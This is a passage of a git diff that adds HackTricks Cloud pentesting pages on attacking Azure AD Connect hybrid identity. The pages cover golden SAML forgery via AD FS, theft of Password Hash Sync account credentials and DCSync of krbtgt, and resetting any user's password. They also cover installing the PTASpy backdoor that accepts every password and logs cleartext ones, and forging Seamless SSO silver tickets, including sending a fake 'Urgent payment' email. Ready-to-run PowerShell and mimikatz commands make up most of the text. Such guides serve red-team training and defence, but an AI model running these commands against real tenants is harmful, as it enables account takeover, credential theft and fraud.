+A parallel can be drawn with the [golden ticket attack](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket), where the key authenticating the user’s identity and permissions (KRBTGT for golden tickets, token-signing private key for golden SAML) can be manipulated to **forge an authentication object** (TGT or SAMLResponse). This allows impersonation of any user, granting unauthorized access to the SP.
+
+Golden SAMLs offer certain advantages:
+
+* They can be **created remotely**, without the need to be part of the domain or federation in question.
+* They remain effective even with **Two-Factor Authentication (2FA)** enabled.
+* The token-signing **private key does not automatically renew**.
+* **Changing a user’s password does not invalidate** an already generated SAML.
+
+#### AWS + AD FS + Golden SAML
+
+[Active Directory Federation Services (AD FS)](https://docs.microsoft.com/en-us/previous-versions/windows/server-2008/bb897402\(v=msdn.10\)) is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation.
+
+With AWS trusting the compromised domain (in a federation), this vulnerability can be exploited to potentially **acquire any permissions in the AWS environment**. The attack necessitates the **private key used to sign the SAML objects**, akin to needing the KRBTGT in a golden ticket attack. Access to the AD FS user account is sufficient to obtain this private key.
+
+The requirements for executing a golden SAML attack include:
+
+* **Token-signing private key**
+* **IdP public certificate**
+* **IdP name**
+* **Role name (role to assume)**
+* Domain\username
+* Role session name in AWS
+* Amazon account ID
+
+_Only the items in bold are mandatory. The others can be filled in as desired._
+
+To acquire the **private key**, access to the **AD FS user account** is necessary. From there, the private key can be **exported from the personal store** using tools like [mimikatz](https://github.com/gentilkiwi/mimikatz). To gather the other required information, you can utilize the Microsoft.Adfs.Powershell snapin as follows, ensuring you're logged in as the ADFS user:
+
+```powershell
+# From an "AD FS" session
+# After having exported the key with mimikatz
+
+# ADFS Public Certificate
+[System.Convert]::ToBase64String($cer.rawdata)
+
+# IdP Name
+(Get-ADFSProperties).Identifier.AbsoluteUri
+
+# Role Name
+(Get-ADFSRelyingPartyTrust).IssuanceTransformRule
+```
+
+With all the information, it's possible to forget a valid SAMLResponse as the user you want to impersonate using [**shimit**](https://github.com/cyberark/shimit)**:**
+
+{% code overflow="wrap" %}
+```bash
+# Apply session for AWS cli
+python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
+# idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
+# pk - Private key file full path (pem format)
+# c - Certificate file full path (pem format)
+# u - User and domain name e.g. domain\username (use \ or quotes in *nix)
+# n - Session name in AWS
+# r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
+# id - AWS account id e.g. 123456789012
+
+# Save SAMLResponse to file
+python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
+```
+{% endcode %}
+
+<figure><img src="../../../../.gitbook/assets/image (128).png" alt=""><figcaption></figcaption></figure>
+
+### On-prem -> cloud
+
+```powershell
+# With a domain user you can get the ImmutableID of the target user
+[System.Convert]::ToBase64String((Get-ADUser -Identity <username> | select -ExpandProperty ObjectGUID).tobytearray())
+
+# On AD FS server execute as administrator
+Get-AdfsProperties | select identifier
+
+# When setting up the AD FS using Azure AD Connect, there is a difference between IssueURI on ADFS server and Azure AD.
+# You need to use the one from AzureAD.
+# Therefore, check the IssuerURI from Azure AD too (Use MSOL module and need GA privs)
+Get-MsolDomainFederationSettings -DomainName deffin.com | select IssuerUri
+
+# Extract the ADFS token signing certificate from the ADFS server using AADInternals
+Export-AADIntADFSSigningCertificate
+
+# Impersonate a user to to access cloud apps
+Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
+```
+
+It's also possible to create ImmutableID of cloud only users and impersonate them
+
+```powershell
+# Create a realistic ImmutableID and set it for a cloud only user 
+[System.Convert]::ToBase64String((New-Guid).tobytearray())
+Set-AADIntAzureADObject -CloudAnchor "User_19e466c5-d938-1293-5967-c39488bca87e" -SourceAnchor "aodilmsic30fugCUgHxsnK=="
+
+# Extract the ADFS token signing certificate from the ADFS server using AADInternals
+Export-AADIntADFSSigningCertificate
+
+# Impersonate the user
+Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose
+```
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed)
+* [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
new file mode 100644
index 0000000000..a509782ebb
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
@@ -0,0 +1,150 @@
+# Az - PHS - Password Hash Sync
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization** is one of the sign-in methods used to accomplish hybrid identity. **Azure AD Connect** synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
+
+<figure><img src="../../../../.gitbook/assets/image (173).png" alt=""><figcaption></figcaption></figure>
+
+It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD.
+
+All **users** and a **hash of the password hashes** are synchronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\
+Moreover, **Built-in** security groups (like domain admins...) are **not synced** to Azure AD.
+
+The **hashes syncronization** occurs every **2 minutes**. However, by default, **password expiry** and **account** **expiry** are **not sync** in Azure AD. So, a user whose **on-prem password is expired** (not changed) can continue to **access Azure resources** using the old password.
+
+When an on-prem user wants to access an Azure resource, the **authentication takes place on Azure AD**.
+
+**PHS** is required for features like **Identity Protection** and AAD Domain Services.
+
+## Pivoting
+
+When PHS is configured some **privileged accounts** are automatically **created**:
+
+* The account **`MSOL_<installationID>`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**.
+* An account **`Sync_<name of on-prem ADConnect Server>_installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD.
+
+Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\
+The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`.
+
+It's possible to extract the configuration from one of the tables, being one encrypted:
+
+`SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;`
+
+The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD.
+
+You can find a [full overview of how these credentials are stored and decrypted in this talk](https://www.youtube.com/watch?v=JEIR5oGCwdg).
+
+### Finding the **Azure AD connect server**
+
+If the **server where Azure AD connect is installed** is domain joined (recommended in the docs), it's possible to find it with:
+
+```powershell
+# ActiveDirectory module
+Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl
+
+#Azure AD module
+Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
+```
+
+### Abusing MSOL\_\*
+
+```powershell
+# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
+Get-AADIntSyncCredentials
+
+# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
+runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
+```
+
+{% hint style="danger" %}
+You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials.
+{% endhint %}
+
+### Abusing Sync\_\*
+
+Compromising the **`Sync_*`** account it's possible to **reset the password** of any user (including Global Administrators)
+
+```powershell
+# This command, run previously, will give us alse the creds of this account
+Get-AADIntSyncCredentials
+
+# Get access token for Sync_* account
+$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
+$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
+Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache
+
+# Get global admins
+Get-AADIntGlobalAdmins
+
+# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
+Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId
+
+# Reset the users password
+Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose
+
+# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)
+```
+
+It's also possible to **modify the passwords of only cloud** users (even if that's unexpected)
+
+```powershell
+# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
+# The CloudAnchor is of the format USER_ObjectID.
+Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID
+
+# Reset password
+Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers
+```
+
+It's also possible to dump the password of this user.
+
+{% hint style="danger" %}
+Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc.
+{% endhint %}
+
+### Seamless SSO
+
+It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses. Check it in:
+
+{% content-ref url="seamless-sso.md" %}
+[seamless-sso.md](seamless-sso.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
+* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/)
+* [https://troopers.de/downloads/troopers19/TROOPERS19\_AD\_Im\_in\_your\_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf)
+* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
new file mode 100644
index 0000000000..d846733589
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
@@ -0,0 +1,100 @@
+# Az - PTA - Pass-through Authentication
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**.
+
+In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS.
+
+The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC).
+
+### Authentication flow
+
+<figure><img src="../../../../.gitbook/assets/image (92).png" alt=""><figcaption></figcaption></figure>
+
+1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password**
+2. The **credentials** are **encrypted** and set in a **queue** in Azure AD
+3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.**
+4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user.
+
+{% hint style="warning" %}
+If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\
+He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key).
+{% endhint %}
+
+### On-Prem -> cloud
+
+If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication):
+
+```powershell
+Install-AADIntPTASpy
+```
+
+{% hint style="info" %}
+If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe).
+{% endhint %}
+
+It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed:
+
+```powershell
+Get-AADIntPTASpyLog -DecodePasswords
+```
+
+This backdoor will:
+
+* Create a hidden folder `C:\PTASpy`
+* Copy a `PTASpy.dll` to `C:\PTASpy`
+* Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process
+
+{% hint style="info" %}
+When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed.
+{% endhint %}
+
+### Cloud -> On-Prem
+
+{% hint style="danger" %}
+After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.**
+{% endhint %}
+
+### Seamless SSO
+
+It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in:
+
+{% content-ref url="seamless-sso.md" %}
+[seamless-sso.md](seamless-sso.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta)
+* [https://aadinternals.com/post/on-prem\_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
new file mode 100644
index 0000000000..75a5557f09
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
@@ -0,0 +1,147 @@
+# Az - Seamless SSO
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically **signs users in when they are on their corporate devices** connected to your corporate network. When enabled, **users don't need to type in their passwords to sign in to Azure AD**, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.
+
+<figure><img src="../../../../.gitbook/assets/image (275).png" alt=""><figcaption><p><a href="https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works">https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works</a></p></figcaption></figure>
+
+Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem domain joined PC**.
+
+It's supported by both [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) and [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md).
+
+Desktop SSO is using **Kerberos** for authentication. When configured, Azure AD Connect creates a **computer account called AZUREADSSOACC`$`** in on-prem AD. The password of the `AZUREADSSOACC$` account is **sent as plain-text to Azure AD** during the configuration.
+
+The **Kerberos tickets** are **encrypted** using the **NTHash (MD4)** of the password and Azure AD is using the sent password to decrypt the tickets.
+
+**Azure AD** exposes an **endpoint** (https://autologon.microsoftazuread-sso.com) that accepts Kerberos **tickets**. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.
+
+### On-prem -> cloud
+
+The **password** of the user **`AZUREADSSOACC$` never changes**. Therefore, a domain admin could compromise the **hash of this account**, and then use it to **create silver tickets** to connect to Azure with **any on-prem user synced**:
+
+```powershell
+# Dump hash using mimikatz
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
+ mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
+
+# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
+Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local
+
+# Dump using ntdsutil and DSInternals
+## Dump NTDS.dit
+ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
+## Extract password
+Install-Module DSInternals
+Import-Module DSInternals
+$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
+(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos
+```
+
+With the hash you can now **generate silver tickets**:
+
+```powershell
+# Get users and SIDs
+Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier
+
+# Create a silver ticket to connect to Azure with mimikatz
+Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
+mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
+
+# Create silver ticket with AADInternal to access Exchange Online
+$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
+$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
+## Send email
+Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."
+```
+
+To utilize the silver ticket, the following steps should be executed:
+
+1. **Initiate the Browser:** Mozilla Firefox should be launched.
+2. **Configure the Browser:**
+   * Navigate to **`about:config`**.
+   * Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically):
+     * `https://aadg.windows.net.nsatc.net`
+     * `https://autologon.microsoftazuread-sso.com`
+3. **Access the Web Application:**
+   * Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/).
+4. **Authentication Process:**
+   * At the logon screen, the username should be entered, leaving the password field blank.
+   * To proceed, press either TAB or ENTER.
+
+{% hint style="success" %}
+This doesn't bypass MFA if enabled
+{% endhint %}
+
+#### Option 2 without dcsync - SeamlessPass
+
+It's also possible to perform this attack **without a dcsync attack** to be more stealth as [explained in this blog post](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). For that you only need one of the following:
+
+* **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9).
+* **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user.
+* **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT
+* **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method).
+
+Finally, with the TGT it's possible to use the tool [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) with:
+
+{% code overflow="wrap" %}
+```
+seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>
+```
+{% endcode %}
+
+Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/).
+
+#### ~~Creating Kerberos tickets for cloud-only users~~ <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
+
+If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824\(v=ws.10\)).
+
+{% hint style="danger" %}
+Changing SID of cloud-only admin users is now **blocked by Microsoft**.\
+For info check [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/)
+{% endhint %}
+
+### On-prem -> Cloud via Resource Based Constrained Delegation <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
+
+Anyone that can manage computer accounts (`AZUREADSSOACC$`) in the container or OU this account is in, it can **configure a resource based constrained delegation over the account and access it**.
+
+```python
+python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$
+```
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)
+* [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
+* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/)
+* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
